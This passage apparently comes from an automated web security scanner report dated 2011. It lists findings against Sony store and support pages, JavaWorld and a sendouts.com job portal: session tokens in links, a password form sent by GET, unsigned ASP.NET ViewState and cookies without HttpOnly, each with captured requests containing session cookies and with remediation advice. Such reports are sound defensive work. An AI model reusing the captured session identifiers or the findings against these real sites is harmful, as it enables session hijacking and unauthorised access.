GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://www.sony.com/SonySearch/Search?mode=&action=search&pst=xss+playstation&pti=0&psti=0&first=1&sti=0&st=Laptop&ti=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true
Response
HTTP/1.1 200 OK Cteonnt-Length: 104997 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 104997 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:49:52 GMT Connection: close Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <link rel="canonical" ...[SNIP]... <li class="catItem EPP_SONY_SEL_HIDDEN"><a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1"> Business Store</a>...[SNIP]... <li id="" class="footerDirectoryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink"> Business Store</a>...[SNIP]...
4.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The response contains the following links that appear to contain session tokens:http://store.sony.com/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA
Response
HTTP/1.1 200 OK ntCoent-Length: 114876 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Date: Tue, 06 Sep 2011 18:50:12 GMT Content-Length: 114876 Connection: close Vary: Accept-Encoding Cache-Control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclude --> <script type...[SNIP]... <li class="catItem EPP_SONY_SEL_HIDDEN"><a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1"> Business Store</a>...[SNIP]... <li id="" class="footerDirectoryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink"> Business Store</a>...[SNIP]...
4.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/StoreCatalogDisplay
Issue detail
The response contains the following links that appear to contain session tokens:http://store.sony.com/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1
Request
GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10
Response
HTTP/1.1 200 OK Cteonnt-Length: 75919 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 75919 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:48:32 GMT Connection: close Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclu...[SNIP]... <li class="catItem EPP_SONY_SEL_HIDDEN"><a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1"> Business Store</a>...[SNIP]... <li id="" class="footerDirectoryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink"> Business Store</a>...[SNIP]...
4.4. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Issue detail
The response contains the following links that appear to contain session tokens:http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse
Request
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1 Host: www.javaworld.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:45:52 GMT Server: Apache/2.2.3 (CentOS) Accept-Ranges: bytes Cache-Control: public, max-age=600 Cneonction: close Content-Type: text/html; charset=UTF-8 Content-Length: 67949 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/h...[SNIP]... </script><script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse"> </script>...[SNIP]...
5. Password field submitted using GET method
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html The form contains the following password field:
Issue background
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST" . It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1 Host: www.javaworld.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:45:52 GMT Server: Apache/2.2.3 (CentOS) Accept-Ranges: bytes Cache-Control: public, max-age=600 Cneonction: close Content-Type: text/html; charset=UTF-8 Content-Length: 67949 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/h...[SNIP]... <div id="login" name="login" method="post" action="/community/rtn_login08.php"> <form id="form_login"> <fieldset>...[SNIP]... <td> <input name="upass" type="password" id="jq_password" class="inputtext" /> </td>...[SNIP]...
6. ASP.NET ViewState without MAC enabled
previous
next
There are 3 instances of this issue:
Issue description
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved. By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure. You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
6.1. http://webconnect.sendouts.com/forgot-login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://webconnect.sendouts.com
Path:
/forgot-login.aspx
Request
GET /forgot-login.aspx?ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1 Host: webconnect.sendouts.com Proxy-Connection: keep-alive Referer: http://webconnect.sendouts.com/login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml" Date: Tue, 06 Sep 2011 20:32:33 GMT Content-Length: 4005 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML> <HEAD> <title>Get My Login Information</title> <meta name...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMjA1MjAyMDk2NGRk " />...[SNIP]...
6.2. http://webconnect.sendouts.com/job-search.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://webconnect.sendouts.com
Path:
/job-search.aspx
Request
GET /job-search.aspx?ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1 Host: webconnect.sendouts.com Proxy-Connection: keep-alive Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml" Date: Tue, 06 Sep 2011 20:31:40 GMT Content-Length: 9831 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Search Open ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE2MzA1MDY2NTUPZBYCZg9kFhACBw8QDxYCHgtfIURhdGFCb3VuZGdkEBULFDw8IEFsbCBDYXRlZ29yaWVzID4+EEJ1c2luZXNzIEFuYWx5c3QURGV2ZWxvcGVyL1Byb2dyYW1tZXIHRmluYW5jZR1GaW5hbmNpYWwgU2VydmljZXMgT3BlcmF0aW9ucw9NYXJrZXRpbmcvU2FsZXMTT3BlcmF0aW9uYWwgR2VuZXJhbCRQb3J0Zm9saWlvIE1ndC4gLyBJbnZlc3RtZW50IEFuYWx5c3QRUXVhbGl0eSBBc3N1cmFuY2UQUmVzZWFyY2ggQW5hbHlzdAlUZWNobmljYWwVCwACOTcDMTEyAzEwNwMxMDADMTA5ATQDMTEzAjk5AzExNAMxMDQUKwMLZ2dnZ2dnZ2dnZ2dkZAINDw8WAh4HVmlzaWJsZWhkZAIPDxAPFgIfAWhkZBYAZAIVDxAPFgIfAGdkEBUBA1VTQRUBBzEwMDAwMDAUKwMBZxYBZmQCGQ8QDxYCHwBnZBAVCxo8PCBBbGwgU3RhdGVzIC8gUmVnaW9ucyA+PgpDYWxpZm9ybmlhC0Nvbm5lY3RpY3V0FERpc3RyaWN0IE9mIENvbHVtYmlhB0Zsb3JpZGENTWFzc2FjaHVzZXR0cwpOZXcgSmVyc2V5CE5ldyBZb3JrBE9oaW8MUGVubnN5bHZhbmlhDVdlc3QgVmlyZ2luaWEVCwAHMTAwNTAwMAcxMDEzMDAwBzEwNDIwMDAHMTAxNTAwMAcxMDI2MDAwBzEwMzQwMDAHMTAzNjAwMAcxMDM4MDAwBzEwNDEwMDAHMTAxMDAwMBQrAwtnZ2dnZ2dnZ2dnZxYBZmQCHQ8QZBAVABUAFCsDABYAZAIhDxBkEBUAFQAUKwMAZGQCIw8PZBYCHgdvbkNsaWNrBZcCdmFyIFRoZUZvcm0gPSBkb2N1bWVudC5mb3Jtc1swXTtpZihudWxsIT1UaGVGb3JtKXt2YXIgTWUgPSAoZXZlbnQuc3JjRWxlbWVudCA/IGV2ZW50LnNyY0VsZW1lbnQgOiBldmVudC50YXJnZXQpO01lLmRpc2FibGVkID0gdHJ1ZTt2YXIgZSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2lucHV0Jyk7ZS50eXBlID0gJ2hpZGRlbic7ZS5uYW1lID0gTWUubmFtZTtlLnZhbHVlID0gTWUudmFsdWU7VGhlRm9ybS5hcHBlbmRDaGlsZChlKTtUaGVGb3JtLnN1Ym1pdCgpO31yZXR1cm4gZmFsc2U7ZGQ= " />...[SNIP]...
6.3. http://webconnect.sendouts.com/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://webconnect.sendouts.com
Path:
/login.aspx
Request
GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1 Host: webconnect.sendouts.com Proxy-Connection: keep-alive Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml" Date: Tue, 06 Sep 2011 20:31:59 GMT Content-Length: 6707 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>LogIn</title...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE0NjI4ODEyODMPZBYCZg9kFgICAQ9kFgICAQ9kFgJmD2QWAmYPZBYCZg9kFgICAQ9kFgQCCQ8PZBYCHgdvbkNsaWNrBZcCdmFyIFRoZUZvcm0gPSBkb2N1bWVudC5mb3Jtc1swXTtpZihudWxsIT1UaGVGb3JtKXt2YXIgTWUgPSAoZXZlbnQuc3JjRWxlbWVudCA/IGV2ZW50LnNyY0VsZW1lbnQgOiBldmVudC50YXJnZXQpO01lLmRpc2FibGVkID0gdHJ1ZTt2YXIgZSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2lucHV0Jyk7ZS50eXBlID0gJ2hpZGRlbic7ZS5uYW1lID0gTWUubmFtZTtlLnZhbHVlID0gTWUudmFsdWU7VGhlRm9ybS5hcHBlbmRDaGlsZChlKTtUaGVGb3JtLnN1Ym1pdCgpO31yZXR1cm4gZmFsc2U7ZAILDw8WAh4LTmF2aWdhdGVVcmwFQWZvcmdvdC1sb2dpbi5hc3B4P0lEPWNmcyZTaXRlSUQ9V2ViQ29ubmVjdCZHcm91cD1jZnMmS2V5PUNOJkNuSWQ9FgYeC29ubW91c2VvdmVyBTJzdGF0dXM9J0ZvcmdldCB1c2VybmFtZSBvciBwYXNzd29yZCc7IHJldHVybiB0cnVlOx4Kb25tb3VzZW91dAUKc3RhdHVzPScnOx4Hb25jbGljawUKc3RhdHVzPScnO2Rk " />...[SNIP]...
7. Cookie without HttpOnly flag set
previous
next
There are 16 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
7.1. http://www.kb.sony.com/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.kb.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":3.5,"c":"http://esupport.sony.com/US/perl/select-system.pl","pv":3,"lc":{"d0":{"v":3,"s":true}},"f":1315353199262,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1Set-Cookie: JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; Path=/ Location: http://esupport.sony.com Content-Type: text/html Content-Length: 0 Date: Tue, 06 Sep 2011 18:55:20 GMT
7.2. http://www.kb.sony.com/selfservice/closeviewdocument.do
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/selfservice/closeviewdocument.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=621E1E69E4996835A7FBF59CEC15156D; Path=/selfservice The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
